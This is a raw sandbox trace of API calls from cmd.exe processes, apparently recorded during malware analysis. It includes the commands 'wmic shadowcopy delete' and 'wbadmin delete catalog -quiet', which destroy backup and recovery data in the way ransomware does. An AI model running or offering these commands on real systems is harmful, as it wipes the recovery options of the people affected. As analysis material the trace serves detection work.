[0062.775] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0062.775] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0062.775] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0062.775] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0062.775] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0062.775] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0062.775] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0062.775] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0062.775] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0062.775] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0062.776] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0062.776] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0062.776] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0062.776] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0062.776] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0062.776] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0062.776] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0062.776] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0062.776] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0062.776] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0062.776] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0062.776] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0062.776] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0062.776] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0062.776] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0062.776] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0062.776] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0062.776] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0062.776] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0062.776] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0062.776] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0062.776] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0062.776] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0062.776] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0062.777] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0062.777] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0062.777] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0062.777] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0062.777] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0062.777] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0062.777] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0062.777] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0062.777] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0062.777] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0062.777] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0062.938] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0062.938] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0062.938] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0062.938] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0062.938] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0062.938] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0062.938] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0062.938] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0062.938] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0062.938] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0062.938] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0062.938] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0062.938] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0062.938] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0062.938] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0062.938] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0062.939] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0062.939] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0062.939] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0062.939] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0062.939] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0062.939] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0062.939] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0062.939] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0062.939] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0062.939] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0062.939] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0062.939] GetProcessHeap () returned 0x570000 [0062.939] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x583050 [0062.939] GetProcessHeap () returned 0x570000 [0062.939] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x38) returned 0x583268 [0062.939] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0062.940] GetProcessHeap () returned 0x570000 [0062.940] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x418) returned 0x5707f0 [0062.940] SetErrorMode (uMode=0x0) returned 0x0 [0062.940] SetErrorMode (uMode=0x1) returned 0x0 [0062.940] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5707f8, lpFilePart=0x24f508 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f508*="Desktop") returned 0x25 [0062.940] SetErrorMode (uMode=0x0) returned 0x1 [0062.940] GetProcessHeap () returned 0x570000 [0062.940] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5707f0, Size=0x5e) returned 0x5707f0 [0062.940] GetProcessHeap () returned 0x570000 [0062.940] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x5707f0) returned 0x5e [0062.940] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.940] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0062.940] GetProcessHeap () returned 0x570000 [0062.940] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x120) returned 0x5832a8 [0062.940] GetProcessHeap () returned 0x570000 [0062.940] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x238) returned 0x570858 [0062.949] GetProcessHeap () returned 0x570000 [0062.949] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x570858, Size=0x122) returned 0x570858 [0062.949] GetProcessHeap () returned 0x570000 [0062.949] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x570858) returned 0x122 [0062.949] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.949] GetProcessHeap () returned 0x570000 [0062.950] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe0) returned 0x5833d0 [0062.950] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5833d0, Size=0x76) returned 0x5833d0 [0062.950] GetProcessHeap () returned 0x570000 [0062.950] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x5833d0) returned 0x76 [0063.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.573] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.574] GetLastError () returned 0x2 [0063.574] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.574] GetLastError () returned 0x2 [0063.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.574] GetLastError () returned 0x2 [0063.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.575] GetLastError () returned 0x2 [0063.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.575] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.575] GetLastError () returned 0x2 [0063.575] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.575] GetLastError () returned 0x2 [0063.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.575] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0x583450 [0063.577] GetProcessHeap () returned 0x570000 [0063.577] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x583490 [0063.577] FindClose (in: hFindFile=0x583450 | out: hFindFile=0x583450) returned 1 [0063.578] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0xffffffff [0063.581] GetLastError () returned 0x2 [0063.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f284, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f284) returned 0x583450 [0063.583] GetProcessHeap () returned 0x570000 [0063.583] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x583490, Size=0x4) returned 0x583490 [0063.583] FindClose (in: hFindFile=0x583450 | out: hFindFile=0x583450) returned 1 [0063.584] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0063.584] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0063.584] GetConsoleTitleW (in: lpConsoleTitle=0x24f77c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0063.585] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f604, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f6cc | out: lpAttributeList=0x24f604, lpSize=0x24f6cc) returned 1 [0063.585] UpdateProcThreadAttribute (in: lpAttributeList=0x24f604, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f6c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f604, lpPreviousValue=0x0) returned 1 [0063.585] GetStartupInfoW (in: lpStartupInfo=0x24f5c0 | out: lpStartupInfo=0x24f5c0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0063.585] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x583450 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0063.585] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0063.586] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0063.586] GetProcessHeap () returned 0x570000 [0063.587] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x583450 | out: hHeap=0x570000) returned 1 [0063.587] GetProcessHeap () returned 0x570000 [0063.587] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xa) returned 0x57fec8 [0063.587] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0063.588] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x24f660*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f6ac | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x24f6ac*(hProcess=0x78, hThread=0x74, dwProcessId=0x9a4, dwThreadId=0x864)) returned 1 [0064.317] CloseHandle (hObject=0x74) returned 1 [0064.317] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0064.317] GetProcessHeap () returned 0x570000 [0064.317] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585eb8 | out: hHeap=0x570000) returned 1 [0064.317] GetEnvironmentStringsW () returned 0x585eb8* [0064.317] GetProcessHeap () returned 0x570000 [0064.317] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x584078 [0064.317] FreeEnvironmentStringsW (penv=0x585eb8) returned 1 [0064.317] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0105.161] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x24f5a0 | out: lpExitCode=0x24f5a0*=0x80041014) returned 1 [0105.162] CloseHandle (hObject=0x78) returned 1 [0105.162] _vsnwprintf (in: _Buffer=0x24f6e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f5ac | out: _Buffer="80041014") returned 8 [0105.162] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0105.163] GetProcessHeap () returned 0x570000 [0105.163] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x570000) returned 1 [0105.163] GetEnvironmentStringsW () returned 0x584078* [0105.163] GetProcessHeap () returned 0x570000 [0105.163] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb5c) returned 0x589560 [0105.163] FreeEnvironmentStringsW (penv=0x584078) returned 1 [0105.163] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0105.163] GetProcessHeap () returned 0x570000 [0105.163] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589560 | out: hHeap=0x570000) returned 1 [0105.163] GetEnvironmentStringsW () returned 0x584078* [0105.163] GetProcessHeap () returned 0x570000 [0105.163] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb5c) returned 0x589560 [0105.163] FreeEnvironmentStringsW (penv=0x584078) returned 1 [0105.163] GetProcessHeap () returned 0x570000 [0105.164] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57fec8 | out: hHeap=0x570000) returned 1 [0105.164] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f604 | out: lpAttributeList=0x24f604) [0105.164] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.164] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.164] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.164] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0105.165] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.165] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0105.165] SetConsoleInputExeNameW () returned 0x1 [0105.165] GetConsoleOutputCP () returned 0x1b5 [0105.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0105.165] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.166] exit (_Code=-2147217388) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42105000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "cmd.exe /c wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x824 [0062.747] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fe44 | out: lpSystemTimeAsFileTime=0x31fe44*(dwLowDateTime=0x1a2084c0, dwHighDateTime=0x1d62227)) [0062.747] GetCurrentProcessId () returned 0x814 [0062.747] GetCurrentThreadId () returned 0x824 [0062.747] GetTickCount () returned 0x11497ae [0062.747] QueryPerformanceCounter (in: lpPerformanceCount=0x31fe3c | out: lpPerformanceCount=0x31fe3c*=18270252038) returned 1 [0062.748] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0062.748] __set_app_type (_Type=0x1) [0062.748] __p__fmode () returned 0x770331f4 [0062.904] __p__commode () returned 0x770331fc [0062.905] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0062.905] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0062.905] GetCurrentThreadId () returned 0x824 [0062.905] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x824) returned 0x60 [0062.905] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.905] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0062.906] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.906] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0062.906] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31fdd4 | out: phkResult=0x31fdd4*=0x0) returned 0x2 [0062.906] VirtualQuery (in: lpAddress=0x31fe0b, lpBuffer=0x31fda4, dwLength=0x1c | out: lpBuffer=0x31fda4*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.906] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31fda4, dwLength=0x1c | out: lpBuffer=0x31fda4*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0062.907] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31fda4, dwLength=0x1c | out: lpBuffer=0x31fda4*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0062.907] VirtualQuery (in: lpAddress=0x223000, lpBuffer=0x31fda4, dwLength=0x1c | out: lpBuffer=0x31fda4*(BaseAddress=0x223000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.907] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31fda4, dwLength=0x1c | out: lpBuffer=0x31fda4*(BaseAddress=0x320000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0062.907] GetConsoleOutputCP () returned 0x1b5 [0062.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.907] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0062.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.907] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0062.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.908] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0062.908] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.908] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.908] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.908] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0062.909] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.909] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0062.909] GetEnvironmentStringsW () returned 0x512008* [0062.909] GetProcessHeap () returned 0x500000 [0062.909] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xaca) returned 0x512ae0 [0062.909] FreeEnvironmentStringsW (penv=0x512008) returned 1 [0062.909] GetProcessHeap () returned 0x500000 [0062.909] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4) returned 0x510c40 [0062.910] GetEnvironmentStringsW () returned 0x512008* [0062.910] GetProcessHeap () returned 0x500000 [0062.910] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xaca) returned 0x5135b8 [0062.910] FreeEnvironmentStringsW (penv=0x512008) returned 1 [0062.910] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31ed44 | out: phkResult=0x31ed44*=0x68) returned 0x0 [0062.910] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x0, lpData=0x31ed50*=0x0, lpcbData=0x31ed48*=0x1000) returned 0x2 [0062.910] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x1, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.910] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x0, lpData=0x31ed50*=0x1, lpcbData=0x31ed48*=0x1000) returned 0x2 [0062.910] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x0, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.910] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x40, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.910] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: 